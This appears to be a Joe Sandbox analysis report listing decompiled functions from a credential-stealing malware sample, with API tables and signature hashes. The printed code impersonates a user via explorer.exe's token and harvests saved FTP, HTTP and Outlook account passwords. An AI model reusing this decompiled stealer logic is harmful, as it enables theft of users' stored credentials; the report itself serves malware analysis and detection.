				char _v20;
				int _v24;
				int _v28;
				int* _v32;
				int* _v36;
				int* _v40;
				int* _v44;
				int* _v48;
				CHAR* _v52;
				CHAR* _v56;
				CHAR* _v60;
				CHAR* _v64;
				char* _v68;
				int _v72;
				int _v76;
				int _v80;
				void* _t85;
				int _t87;
				int _t90;
				int _t94;
				int _t101;
				int _t108;
				int _t110;
				int _t115;
				int _t133;
				int _t136;
				int _t138;
				void* _t140;
				int _t141;
				int* _t143;

				_t85 = E10001EEF(_a8);
				if(_t85 != 0) {
					_t87 = E10004137(_a8);
					__eflags = _t87;
					if(_t87 == 0) {
						E10006B0B(_a12, _a16);
						_t90 = E10001FB7(__eflags, _a8,  &_v20);
						__eflags = _t90;
						if(_t90 != 0) {
							_t94 = E100025C0(_v12, _v8);
							__eflags = _t94;
							if(_t94 != 0) {
								_v24 = _t94;
								_t143 = _t94;
								__eflags =  *_t143;
								if(__eflags != 0) {
									_v52 = E10006D38(__eflags, _t143);
									_push(lstrcmpA("#2c", _v52));
									_push(lstrcmpA("#2d", _v52));
									_t101 = lstrcmpA("#2e", _v52);
									_pop(_t141);
									_pop(_t138);
									__eflags = _t101;
									if(_t101 == 0) {
										L10:
										__eflags = _t138;
										if(_t138 != 0) {
											_v80 = 0;
										} else {
											_v80 = 1;
										}
										asm("cld");
										_t140 = 0xffffffff;
										asm("repne scasb");
										__eflags =  *_t143;
										if ( *_t143 != 0) goto L14;
										_v28 = 0;
										while(1) {
											__eflags =  *_t143;
											if(__eflags == 0) {
												goto L54;
											}
											_v56 = E10006D38(__eflags, _t143);
											__eflags = _v28;
											if(_v28 != 0) {
												__eflags = _v28 - 1;
												if(_v28 != 1) {
													__eflags = _v28 - 2;
													if(_v28 != 2) {
														__eflags = _v28 - 3;
														if(_v28 != 3) {
															__eflags = _v28 - 4;
															if(_v28 != 4) {
																__eflags = _v28 - 5;
																if(_v28 != 5) {
																	__eflags = _v28 - 6;
																	if(_v28 == 6) {
																		_v28 = 2;
																	}
																} else {
																	_v48 = _t143;
																	__eflags = _v80;
																	if(__eflags == 0) {
																		_v28 = 6;
																	} else {
																		_v28 = 2;
																	}
																	_v68 = 0;
																	_v60 = 0;
																	_v64 = 0;
																	_v72 = 0;
																	_v76 = 0;
																	_v68 = E10006D38(__eflags, _v32);
																	_v60 = E10006D38(__eflags, _v40);
																	_v64 = E10006D38(__eflags, _v48);
																	__eflags =  *0x10010155;
																	if( *0x10010155 != 0) {
																		__eflags =  *0x10010155 - 1;
																		if( *0x10010155 != 1) {
																			_t115 = 0;
																			__eflags = 0;
																		} else {
																			_t115 = StrCmpNIA(_v68, "ftp.", lstrlenA("ftp."));
																		}
																	} else {
																		_t133 = StrCmpNIA(_v68, "ftp://", lstrlenA("ftp://"));
																		__eflags = _t133;
																		if(_t133 != 0) {
																			_t133 = StrCmpNIA(_v68, "http://", lstrlenA("http://"));
																		}
																		_t115 = _t133;
																		__eflags = _t115;
																		if(_t115 != 0) {
																			_t115 = StrCmpNIA(_v68, "https://", lstrlenA("https://"));
																		}
																	}
																	__eflags = _t115;
																	if(_t115 == 0) {
																		_v72 = E10006BEC(_t140, _v60, lstrlenA(_v60));
																		_v76 = E10006BEC(_t140, _v64, lstrlenA(_v64));
																		__eflags = _v68;
																		if(_v68 != 0) {
																			__eflags = _v76;
																			if(_v76 != 0) {
																				E10001522(_a4, 0xbeef0000);
																				E10001584(_a4, _v68);
																				E10001584(_a4, _v72);
																				E10001584(_a4, _v76);
																			}
																		}
																	}
																	E10001871(_v68);
																	E10001871(_v60);
																	E10001871(_v64);
																	E10001871(_v72);
																	E10001871(_v76);
																}
															} else {
																_v44 = _t143;
																_v28 = 5;
															}
														} else {
															_v40 = _t143;
															_v28 = 4;
														}
													} else {
														_v36 = _t143;
														_v28 = 3;
													}
												} else {
													_v32 = _t143;
													_v28 = 2;
												}
												__eflags = _v28;
												if(_v28 != 0) {
													_t108 = lstrcmpA(_v56, 0x1000f8fd);
													__eflags = _t108;
													if(_t108 == 0) {
														_v28 = 1;
													}
													_t110 = lstrcmpA(_v56, "---");
													__eflags = _t110;
													if(_t110 == 0) {
														_v28 = 2;
													}
												}
											} else {
												_t136 = lstrcmpA(_v56, 0x1000f8fd);
												__eflags = _t136;
												if(_t136 == 0) {
													_v28 = 1;
												}
											}
											E10001871(_v56);
											asm("cld");
											_t140 = 0xffffffff;
											asm("repne scasb");
											__eflags =  *_t143;
											if( *_t143 != 0) {
												continue;
											}
											goto L54;
										}
									} else {
										__eflags = _t141;
										if(_t141 == 0) {
											goto L10;
										} else {
											_t138 = _t138;
											__eflags = _t138;
											if(_t138 == 0) {
												goto L10;
											}
										}
									}
									L54:
									E10001871(_v52);
								}
								E10001871(_v24);
							}
							E1000204C( &_v20);
						}
						return E10006BC3();
					} else {
						return _t87;
					}
				} else {
					return _t85;
				}
			}



































                                                                                                                                        0x10006d83
                                                                                                                                        0x10006d85
                                                                                                                                        0x10006d94
                                                                                                                                        0x10006d94
                                                                                                                                        0x10006d96
                                                                                                                                        0x10006da3
                                                                                                                                        0x10006daf
                                                                                                                                        0x10006db4
                                                                                                                                        0x10006db6
                                                                                                                                        0x10006dc7
                                                                                                                                        0x10006dc7
                                                                                                                                        0x10006dc9
                                                                                                                                        0x10006dcf
                                                                                                                                        0x10006dd2
                                                                                                                                        0x10006dd4
                                                                                                                                        0x10006dd7
                                                                                                                                        0x10006de3
                                                                                                                                        0x10006df3
                                                                                                                                        0x10006e01
                                                                                                                                        0x10006e0a
                                                                                                                                        0x10006e0f
                                                                                                                                        0x10006e10
                                                                                                                                        0x10006e11
                                                                                                                                        0x10006e13
                                                                                                                                        0x10006e21
                                                                                                                                        0x10006e21
                                                                                                                                        0x10006e23
                                                                                                                                        0x10006e2e
                                                                                                                                        0x10006e25
                                                                                                                                        0x10006e25
                                                                                                                                        0x10006e25
                                                                                                                                        0x10006e35
                                                                                                                                        0x10006e38
                                                                                                                                        0x10006e3d
                                                                                                                                        0x10006e3f
                                                                                                                                        0x10006e41
                                                                                                                                        0x10006e43
                                                                                                                                        0x10006e4a
                                                                                                                                        0x10006e4a
                                                                                                                                        0x10006e4d
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x10006e59
                                                                                                                                        0x10006e5c
                                                                                                                                        0x10006e60
                                                                                                                                        0x10006e7f
                                                                                                                                        0x10006e83
                                                                                                                                        0x10006e94
                                                                                                                                        0x10006e98
                                                                                                                                        0x10006ea9
                                                                                                                                        0x10006ead
                                                                                                                                        0x10006ebe
                                                                                                                                        0x10006ec2
                                                                                                                                        0x10006ed3
                                                                                                                                        0x10006ed7
                                                                                                                                        0x1000704a
                                                                                                                                        0x1000704e
                                                                                                                                        0x10007050
                                                                                                                                        0x10007050
                                                                                                                                        0x10006edd
                                                                                                                                        0x10006edd
                                                                                                                                        0x10006ee0
                                                                                                                                        0x10006ee4
                                                                                                                                        0x10006eef
                                                                                                                                        0x10006ee6
                                                                                                                                        0x10006ee6
                                                                                                                                        0x10006ee6
                                                                                                                                        0x10006ef6
                                                                                                                                        0x10006efd
                                                                                                                                        0x10006f04
                                                                                                                                        0x10006f0b
                                                                                                                                        0x10006f12
                                                                                                                                        0x10006f21
                                                                                                                                        0x10006f2c
                                                                                                                                        0x10006f37
                                                                                                                                        0x10006f3a
                                                                                                                                        0x10006f41
                                                                                                                                        0x10006f95
                                                                                                                                        0x10006f9c
                                                                                                                                        0x10006fb8
                                                                                                                                        0x10006fb8
                                                                                                                                        0x10006f9e
                                                                                                                                        0x10006fb1
                                                                                                                                        0x10006fb1
                                                                                                                                        0x10006f43
                                                                                                                                        0x10006f5b
                                                                                                                                        0x10006f5b
                                                                                                                                        0x10006f5d
                                                                                                                                        0x10006f72
                                                                                                                                        0x10006f72
                                                                                                                                        0x10006f77
                                                                                                                                        0x10006f77
                                                                                                                                        0x10006f79
                                                                                                                                        0x10006f8e
                                                                                                                                        0x10006f8e
                                                                                                                                        0x10006f93
                                                                                                                                        0x10006fba
                                                                                                                                        0x10006fbc
                                                                                                                                        0x10006fcf
                                                                                                                                        0x10006fe3
                                                                                                                                        0x10006fe6
                                                                                                                                        0x10006fea
                                                                                                                                        0x10006fec
                                                                                                                                        0x10006ff0
                                                                                                                                        0x10006ffa
                                                                                                                                        0x10007005
                                                                                                                                        0x10007010
                                                                                                                                        0x1000701b
                                                                                                                                        0x1000701b
                                                                                                                                        0x10006ff0
                                                                                                                                        0x10006fea
                                                                                                                                        0x10007023
                                                                                                                                        0x1000702b
                                                                                                                                        0x10007033
                                                                                                                                        0x1000703b
                                                                                                                                        0x10007043
                                                                                                                                        0x10007043
                                                                                                                                        0x10006ec4
                                                                                                                                        0x10006ec4
                                                                                                                                        0x10006ec7
                                                                                                                                        0x10006ec7
                                                                                                                                        0x10006eaf
                                                                                                                                        0x10006eaf
                                                                                                                                        0x10006eb2
                                                                                                                                        0x10006eb2
                                                                                                                                        0x10006e9a
                                                                                                                                        0x10006e9a
                                                                                                                                        0x10006e9d
                                                                                                                                        0x10006e9d
                                                                                                                                        0x10006e85
                                                                                                                                        0x10006e85
                                                                                                                                        0x10006e88
                                                                                                                                        0x10006e88
                                                                                                                                        0x10007057
                                                                                                                                        0x1000705b
                                                                                                                                        0x10007065
                                                                                                                                        0x1000706a
                                                                                                                                        0x1000706c
                                                                                                                                        0x1000706e
                                                                                                                                        0x1000706e
                                                                                                                                        0x1000707d
                                                                                                                                        0x10007082
                                                                                                                                        0x10007084
                                                                                                                                        0x10007086
                                                                                                                                        0x10007086
                                                                                                                                        0x10007084
                                                                                                                                        0x10006e62
                                                                                                                                        0x10006e6a
                                                                                                                                        0x10006e6f
                                                                                                                                        0x10006e71
                                                                                                                                        0x10006e73
                                                                                                                                        0x10006e73
                                                                                                                                        0x10006e7a
                                                                                                                                        0x10007090
                                                                                                                                        0x10007095
                                                                                                                                        0x10007098
                                                                                                                                        0x1000709d
                                                                                                                                        0x1000709f
                                                                                                                                        0x100070a1
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x100070a1
                                                                                                                                        0x10006e15
                                                                                                                                        0x10006e15
                                                                                                                                        0x10006e17
                                                                                                                                        0x00000000
                                                                                                                                        0x10006e19
                                                                                                                                        0x10006e19
                                                                                                                                        0x10006e19
                                                                                                                                        0x10006e1b
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x10006e1b
                                                                                                                                        0x10006e17
                                                                                                                                        0x100070a7
                                                                                                                                        0x100070aa
                                                                                                                                        0x100070aa
                                                                                                                                        0x100070b2
                                                                                                                                        0x100070b2
                                                                                                                                        0x100070bb
                                                                                                                                        0x100070bb
                                                                                                                                        0x100070c7
                                                                                                                                        0x10006d9a
                                                                                                                                        0x10006d9a
                                                                                                                                        0x10006d9a
                                                                                                                                        0x10006d89
                                                                                                                                        0x10006d89
                                                                                                                                        0x10006d89

                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.711413483.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_10000000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: #2c$#2d$#2e$---$ftp.$ftp://$http://$https://
                                                                                                                                        • API String ID: 0-1526611526
                                                                                                                                        • Opcode ID: 724ba7b4f942c0c7724bbe666324037727e47c4a0af3658c954cc083d4f00e14
                                                                                                                                        • Instruction ID: 2075b8312cb01d267929bb0c54c36726008812060f9829873acf7dd839938290
                                                                                                                                        • Opcode Fuzzy Hash: 724ba7b4f942c0c7724bbe666324037727e47c4a0af3658c954cc083d4f00e14
                                                                                                                                        • Instruction Fuzzy Hash: DE915779D0024AEAFF11DFA0DC46BEEBAB2FF043C4F204125F114A50A9DB799A91DB51
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 100.00%

                                                                                                                                        Function 10002D12, Relevance: 26.3, APIs: 14, Strings: 1, Instructions: 86registryprocessUNIQUE
                                                                                                                                        Download Yara Rule
                                                                                                                                        C-Code - Quality: 76%
                                                                                                                                        			E10002D12() {
				void* _t30;
				int _t33;
				void* _t41;
				void* _t44;
				void* _t53;
				void* _t57;
				int _t59;
				void* _t60;

				_t57 = 0;
				 *((intOrPtr*)(_t60 - 0xc)) =  *0x1000f498();
				 *(_t60 - 0x134) = 0x128;
				_t30 = CreateToolhelp32Snapshot(2, 0);
				if(_t30 != 0xffffffff) {
					 *(_t60 - 0x138) = _t30;
					_t33 = Process32First( *(_t60 - 0x138), _t60 - 0x134);
					while(_t33 != 0) {
						if(StrStrIA(_t60 - 0x110, "explorer.exe") == 0) {
							L18:
							_t33 = Process32Next( *(_t60 - 0x138), _t60 - 0x134);
							continue;
						} else {
							 *(_t60 - 0x13c) = 0;
							_t41 =  *0x1000f49c( *(_t60 - 0x12c), _t60 - 0x13c);
							_t59 =  *(_t60 - 0x13c);
							if(_t41 == 0 || _t59 !=  *((intOrPtr*)(_t60 - 0xc))) {
								goto L18;
							} else {
								_t44 = OpenProcess(0x2000000, 0,  *(_t60 - 0x12c));
								if(_t44 == 0) {
									goto L18;
								} else {
									 *(_t60 - 8) = _t44;
									if(OpenProcessToken( *(_t60 - 8), 0x201eb, _t60 - 4) == 0) {
										CloseHandle( *(_t60 - 8));
										goto L18;
									} else {
										if(ImpersonateLoggedOnUser( *(_t60 - 4)) == 0) {
											CloseHandle( *(_t60 - 4));
											CloseHandle( *(_t60 - 8));
											goto L18;
										} else {
											_t57 = _t57 + 1;
											 *(_t60 - 0x140) = 0;
											_t53 = _t60 - 0x140;
											_push(_t53);
											_push(0xf003f);
											L1000BAD0();
											if(_t53 == 0 &&  *(_t60 - 0x140) != 0) {
												 *0x1000f159 =  *(_t60 - 0x140);
											}
											if( *((intOrPtr*)(_t60 + 8)) != 0) {
												 *__eax =  *(_t60 - 4);
											}
										}
									}
								}
							}
						}
						break;
					}
					CloseHandle( *(_t60 - 0x138));
				}
				return _t57;
			}











                                                                                                                                        0x10002d12
                                                                                                                                        0x10002d1a
                                                                                                                                        0x10002d1d
                                                                                                                                        0x10002d2b
                                                                                                                                        0x10002d33
                                                                                                                                        0x10002d39
                                                                                                                                        0x10002d4c
                                                                                                                                        0x10002d51
                                                                                                                                        0x10002d6c
                                                                                                                                        0x10002e45
                                                                                                                                        0x10002e52
                                                                                                                                        0x00000000
                                                                                                                                        0x10002d72
                                                                                                                                        0x10002d72
                                                                                                                                        0x10002d89
                                                                                                                                        0x10002d8f
                                                                                                                                        0x10002d97
                                                                                                                                        0x00000000
                                                                                                                                        0x10002da6
                                                                                                                                        0x10002db8
                                                                                                                                        0x10002dba
                                                                                                                                        0x00000000
                                                                                                                                        0x10002dc0
                                                                                                                                        0x10002dc0
                                                                                                                                        0x10002dd7
                                                                                                                                        0x10002e40
                                                                                                                                        0x00000000
                                                                                                                                        0x10002dd9
                                                                                                                                        0x10002de4
                                                                                                                                        0x10002e2e
                                                                                                                                        0x10002e36
                                                                                                                                        0x00000000
                                                                                                                                        0x10002de6
                                                                                                                                        0x10002de6
                                                                                                                                        0x10002de7
                                                                                                                                        0x10002df1
                                                                                                                                        0x10002df7
                                                                                                                                        0x10002df8
                                                                                                                                        0x10002dfd
                                                                                                                                        0x10002e04
                                                                                                                                        0x10002e15
                                                                                                                                        0x10002e15
                                                                                                                                        0x10002e20
                                                                                                                                        0x10002e25
                                                                                                                                        0x10002e25
                                                                                                                                        0x10002e27
                                                                                                                                        0x10002de4
                                                                                                                                        0x10002dd7
                                                                                                                                        0x10002dba
                                                                                                                                        0x10002d97
                                                                                                                                        0x00000000
                                                                                                                                        0x10002d6c
                                                                                                                                        0x10002e62
                                                                                                                                        0x10002e62
                                                                                                                                        0x10002e6b

                                                                                                                                        APIs
                                                                                                                                        • WTSGetActiveConsoleSessionId.KERNEL32(10002CE7,?,?,1000B78A,?), ref: 10002D14
                                                                                                                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 10002D2B
                                                                                                                                        • Process32First.KERNEL32(?,00000128), ref: 10002D4C
                                                                                                                                        • StrStrIA.SHLWAPI(?,explorer.exe), ref: 10002D65
                                                                                                                                        • ProcessIdToSessionId.KERNEL32(?,00000000,?,explorer.exe,?,00000128,?,explorer.exe), ref: 10002D89
                                                                                                                                        • OpenProcess.KERNEL32(02000000,00000000,?), ref: 10002DB3
                                                                                                                                        • OpenProcessToken.ADVAPI32(?,000201EB,?,02000000,00000000,?), ref: 10002DCF
                                                                                                                                        • ImpersonateLoggedOnUser.ADVAPI32(?), ref: 10002DDC
                                                                                                                                        • RegOpenCurrentUser.ADVAPI32(000F003F,00000000), ref: 10002DFD
                                                                                                                                        • Process32Next.KERNEL32 ref: 10002E52
                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 10002E62
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.711413483.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_10000000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: OpenProcess$Process32SessionUser$ActiveCloseConsoleCreateCurrentFirstHandleImpersonateLoggedNextSnapshotTokenToolhelp32
                                                                                                                                        • String ID: explorer.exe
                                                                                                                                        • API String ID: 2643599891-3187896405
                                                                                                                                        • Opcode ID: 77f4010b4860d918ae7ab91ce8beb468eb98fa66940ba223bd9168f6a0119d09
                                                                                                                                        • Instruction ID: 96c394887a566ec73a4a06e538481041d9d39d70be7eea2e8df390db5540fba8
                                                                                                                                        • Opcode Fuzzy Hash: 77f4010b4860d918ae7ab91ce8beb468eb98fa66940ba223bd9168f6a0119d09
                                                                                                                                        • Instruction Fuzzy Hash: FF310E31940659EBEF62DF60CC86BEDBBB4EB043C4F1000A5E619A5069DB749F94DF10
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 100.00%

                                                                                                                                        Function 1000AADE, Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 103stringCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        C-Code - Quality: 96%
                                                                                                                                        			E1000AADE(void* __ecx, intOrPtr _a4, intOrPtr _a8, short* _a12, intOrPtr _a16, intOrPtr* _a20) {
				char _v1028;
				char _v2052;
				char _v3076;
				int _v3080;
				int _v3084;
				intOrPtr _v3088;
				char _v3092;
				char _v3096;
				char _v3100;
				intOrPtr _v3104;
				void* _t56;
				int _t61;
				void* _t66;

				_t66 = __ecx;
				E1000795C(_a4,  &_v1028, _a20);
				E100079A7(_a4, _a8,  &_v2052, _a20);
				WideCharToMultiByte(0, 0, _a12, 0xffffffff,  &_v3076, 0x3ff, 0, 0);
				_v3092 = 0x10;
				_v3088 = 2;
				_v3084 = 0;
				_v3080 = 0;
				_t56 =  *((intOrPtr*)( *_a20 + 0x44))(_a20, 0, _a4, _a8, _a12,  &_v3100,  &_v3096,  &_v3092, 0);
				if(_v3100 == 0 || _v3096 == 0) {
					return _t56;
				} else {
					if(lstrcmpiA( &_v1028, "identification") == 0) {
						L4:
						_v3104 = 0xbeef0005;
						if(lstrcmpiA( &_v2052, "inetcomm server passwords") == 0) {
							L7:
							if(_v3104 != 0xbeef0007) {
								_t61 = E1000A9EF(_t66, _v3104, _a12, _v3096, _v3100, _a16, _a8, 1);
							} else {
								_t61 = E1000A9EF(_t66, _v3104, _a12, _v3096, _v3100, _a16, _a8, 0);
							}
							L10:
							_push(_v3096);
							L1000BA70();
							return _t61;
						}
						_v3104 = 0xbeef0006;
						if(lstrcmpiA( &_v2052, "outlook account manager passwords") == 0) {
							goto L7;
						}
						_v3104 = 0xbeef0007;
						_t61 = lstrcmpiA( &_v2052, "identities");
						if(_t61 != 0) {
							goto L10;
						}
						goto L7;
					}
					_t61 = lstrcmpiA( &_v1028, "identitymgr");
					if(_t61 != 0) {
						goto L10;
					}
					goto L4;
				}
			}
















                                                                                                                                        0x1000aade
                                                                                                                                        0x1000aaf4
                                                                                                                                        0x1000ab09
                                                                                                                                        0x1000ab27
                                                                                                                                        0x1000ab2c
                                                                                                                                        0x1000ab36
                                                                                                                                        0x1000ab40
                                                                                                                                        0x1000ab4a
                                                                                                                                        0x1000ab7e
                                                                                                                                        0x1000ab88
                                                                                                                                        0x1000ac84
                                                                                                                                        0x1000ab9b
                                                                                                                                        0x1000abae
                                                                                                                                        0x1000abc9
                                                                                                                                        0x1000abc9
                                                                                                                                        0x1000abe6
                                                                                                                                        0x1000ac26
                                                                                                                                        0x1000ac30
                                                                                                                                        0x1000ac73
                                                                                                                                        0x1000ac32
                                                                                                                                        0x1000ac4f
                                                                                                                                        0x1000ac4f
                                                                                                                                        0x1000ac78
                                                                                                                                        0x1000ac78
                                                                                                                                        0x1000ac7e
                                                                                                                                        0x00000000
                                                                                                                                        0x1000ac7e
                                                                                                                                        0x1000abe8
                                                                                                                                        0x1000ac05
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x1000ac07
                                                                                                                                        0x1000ac1d
                                                                                                                                        0x1000ac24
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x1000ac24
                                                                                                                                        0x1000abbc
                                                                                                                                        0x1000abc3
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x1000abc3

                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 1000795C: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000003FF,00000000,00000000), ref: 10007995
                                                                                                                                          • Part of subcall function 1000795C: CoTaskMemFree.OLE32(?,00000000,00000000,?,000000FF,?,000003FF,00000000,00000000), ref: 1000799E
                                                                                                                                          • Part of subcall function 100079A7: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000003FF,00000000,00000000), ref: 100079E3
                                                                                                                                          • Part of subcall function 100079A7: CoTaskMemFree.OLE32(?,00000000,00000000,?,000000FF,?,000003FF,00000000,00000000), ref: 100079EC
                                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000003FF,00000000,00000000), ref: 1000AB27
                                                                                                                                        • lstrcmpiA.KERNEL32(?,identification), ref: 1000ABA7
                                                                                                                                        • lstrcmpiA.KERNEL32(?,identitymgr,?,identification), ref: 1000ABBC
                                                                                                                                        • lstrcmpiA.KERNEL32(?,inetcomm server passwords,?,identification), ref: 1000ABDF
                                                                                                                                        • lstrcmpiA.KERNEL32(?,outlook account manager passwords,?,inetcomm server passwords,?,identification), ref: 1000ABFE
                                                                                                                                        • lstrcmpiA.KERNEL32(?,identities,?,outlook account manager passwords,?,inetcomm server passwords,?,identification), ref: 1000AC1D
                                                                                                                                        • CoTaskMemFree.OLE32(00000000,?,inetcomm server passwords,?,identification), ref: 1000AC7E
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.711413483.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_10000000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: lstrcmpi$ByteCharFreeMultiTaskWide
                                                                                                                                        • String ID: identification$identities$identitymgr$inetcomm server passwords$outlook account manager passwords
                                                                                                                                        • API String ID: 636431001-4287852900
                                                                                                                                        • Opcode ID: f65fd73147f5aca0a46af2319b02ed65869736b7c56365dc2e62a4b937746f16
                                                                                                                                        • Instruction ID: aa4ee62190c4d2ee97cf88f99713530f27591a1cf00d227c7f36b9cc53f8f228
                                                                                                                                        • Opcode Fuzzy Hash: f65fd73147f5aca0a46af2319b02ed65869736b7c56365dc2e62a4b937746f16
                                                                                                                                        • Instruction Fuzzy Hash: 0E41487590021DABFF21DF90CD41FDA7B7AFB06380F004291BA0865196DB719AD4DF90
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 0.05%

                                                                                                                                        Function 10002CCA, Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 101UNIQUE
                                                                                                                                        Download Yara Rule
                                                                                                                                        C-Code - Quality: 64%
                                                                                                                                        			E10002CCA(signed int __eax, signed int __edx, intOrPtr _a3, void* _a4) {
				void* _v8;
				void* _v12;
				void* _v16;
				void* _v276;
				void* _v304;
				void* _v312;
				void* _v316;
				void* _v320;
				void* _v324;
				signed int _t34;
				void* _t36;
				signed int _t39;
				signed int _t40;

				_push(_t36);
				_t39 = __edx ^ __eax;
				_t34 = __eax ^ _t39;
				_t40 = _t39 ^ _t34;
				_push(0x10002ce7);
				asm("clc");
				if(_t40 < 0) {
					_t1 = _t36 + 0xf4983d;
					 *_t1 =  *((char*)(_t36 + 0xf4983d)) + 1;
					asm("adc [eax], al");
					if( *_t1 == 0 ||  *0x1000f49c == 0 ||  *0x1000f4d4 == 0) {
						return 0;
					} else {
						_a3 = _a3 + _t40;
					}
				} else {
					return _t34;
				}
			}
















                                                                                                                                        0x10002cd3
                                                                                                                                        0x10002cd4
                                                                                                                                        0x10002cd6
                                                                                                                                        0x10002cd8
                                                                                                                                        0x10002cda
                                                                                                                                        0x10002ce0
                                                                                                                                        0x10002ce2
                                                                                                                                        0x10002ce6
                                                                                                                                        0x10002ce6
                                                                                                                                        0x10002cec
                                                                                                                                        0x10002cee
                                                                                                                                        0x10002d0f
                                                                                                                                        0x10002d02
                                                                                                                                        0x10002d08
                                                                                                                                        0x10002d08
                                                                                                                                        0x10002ce5
                                                                                                                                        0x10002ce5
                                                                                                                                        0x10002ce5

                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.711413483.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_10000000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: explorer.exe
                                                                                                                                        • API String ID: 0-3187896405
                                                                                                                                        • Opcode ID: aae1b6f692b7d5d64feb95fb9a0548ed15fbc17016c41bbad873ed9869b645cf
                                                                                                                                        • Instruction ID: ff7abe58b84ce967abbcf31081a5852efd773401714cfb915e4d7bfdf69332b0
                                                                                                                                        • Opcode Fuzzy Hash: aae1b6f692b7d5d64feb95fb9a0548ed15fbc17016c41bbad873ed9869b645cf
                                                                                                                                        • Instruction Fuzzy Hash: 87316232A402589BFB61DF60CC85BEEB7F5EB043C4F1040A5E615E50A9DB749E94DF50
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 100.00%

                                                                                                                                        Function 100095B3, Relevance: 18.1, APIs: 8, Strings: 4, Instructions: 129stringUNIQUE
                                                                                                                                        Download Yara Rule
                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                        			E100095B3(void* __eax, void* __ecx, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				int _v8;
				char _v12;
				char _v16;
				int _v20;
				char _v24;
				char _v28;
				int _v32;
				char _v36;
				char _v40;
				char* _v44;
				int _v48;
				int _v52;
				intOrPtr _t49;
				int _t62;
				int _t76;
				void* _t79;

				_t79 = __ecx;
				if(_a16 != 0) {
					_t49 = _a16;
					__eflags =  *0x10012e98 - _t49; // 0x0
					if(__eflags < 0) {
						__eflags =  *0x10012e9c - _t49; // 0x0
						if(__eflags < 0) {
							__eflags =  *0x10012ea0 - _t49; // 0x0
							if(__eflags < 0) {
								E10008860(_a12,  *0x10012e98,  &_v8,  &_v12,  &_v16);
								E10008860(_a12,  *0x10012ea0,  &_v20,  &_v24,  &_v28);
								_t49 = E10008860(_a12,  *0x10012e9c,  &_v32,  &_v36,  &_v40);
								__eflags = _v8;
								if(_v8 != 0) {
									__eflags = _v32;
									if(_v32 != 0) {
										_v44 = E10001888(_v8 + 1);
										_t62 = E100018BF(_v16, _v44, _v8);
										_v48 = 0;
										_v52 = 0;
										__eflags =  *0x10010155;
										if( *0x10010155 != 0) {
											__eflags =  *0x10010155 - 1;
											if( *0x10010155 != 1) {
												__eflags =  *0x10010155 - 2;
												if( *0x10010155 == 2) {
													_t62 = 0;
													__eflags = 0;
												}
											} else {
												_t62 = StrCmpNIA(_v44, "ftp.", lstrlenA("ftp."));
											}
											goto L17;
										} else {
											_t76 = StrCmpNIA(_v44, "ftp://", lstrlenA("ftp://"));
											__eflags = _t76;
											if(_t76 != 0) {
												_t76 = StrCmpNIA(_v44, "http://", lstrlenA("http://"));
											}
											_t62 = _t76;
											__eflags = _t62;
											if(_t62 != 0) {
												_t62 = StrCmpNIA(_v44, "https://", lstrlenA("https://"));
											}
											L17:
											__eflags = _t62;
											if(_t62 == 0) {
												__eflags = _v20;
												if(_v20 != 0) {
													_v48 = E10006BEC(_t79, _v28, _v20);
												}
												_v52 = E10006BEC(_t79, _v40, _v32);
												__eflags = _v44;
												if(_v44 != 0) {
													__eflags = _v52;
													if(_v52 != 0) {
														E10001522(_a8, _a20);
														E10001584(_a8, _v44);
														E10001584(_a8, _v48);
														E10001584(_a8, _v52);
													}
												}
											}
											E10001871(_v48);
											E10001871(_v52);
											return E10001871(_v44);
										}
									}
								}
							}
						}
					}
					return _t49;
				} else {
					return __eax;
				}
			}



















                                                                                                                                        0x100095b3
                                                                                                                                        0x100095bd
                                                                                                                                        0x100095c3
